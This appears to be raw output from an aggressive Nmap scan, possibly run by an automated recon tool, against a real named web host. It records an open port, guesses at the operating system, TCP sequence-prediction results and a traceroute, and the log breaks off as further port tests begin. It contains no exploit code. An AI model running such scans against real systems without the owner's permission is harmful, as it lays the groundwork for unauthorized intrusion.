Completed Parallel DNS resolution of 1 host. at 14:56, 0.07s elapsed
NSE: Script scanning 151.101.66.137.
Initiating NSE at 14:56
Completed NSE at 14:58, 90.46s elapsed
Initiating NSE at 14:58
Completed NSE at 14:58, 1.23s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.66.137)
Host is up (0.096s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.130.137 151.101.194.137 151.101.2.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649
PORT STATE SERVICE VERSION
513/tcp open login?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 (89%), Linux 5.0 - 5.3 (89%), Linux 5.4 (89%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 20.961 days (since Mon Jan 31 15:54:54 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 513/tcp)
HOP RTT ADDRESS
1 115.83 ms 151.101.66.137
NSE: Script Post-scanning.
Initiating NSE at 14:58
Completed NSE at 14:58, 0.00s elapsed
Initiating NSE at 14:58
Completed NSE at 14:58, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 258.01 seconds
Raw packets sent: 71 (6.592KB) | Rcvd: 40 (2.508KB)
+ -- --=[Port 514 opened... running tests...
+ -- --=[Port 1099 opened... running tests...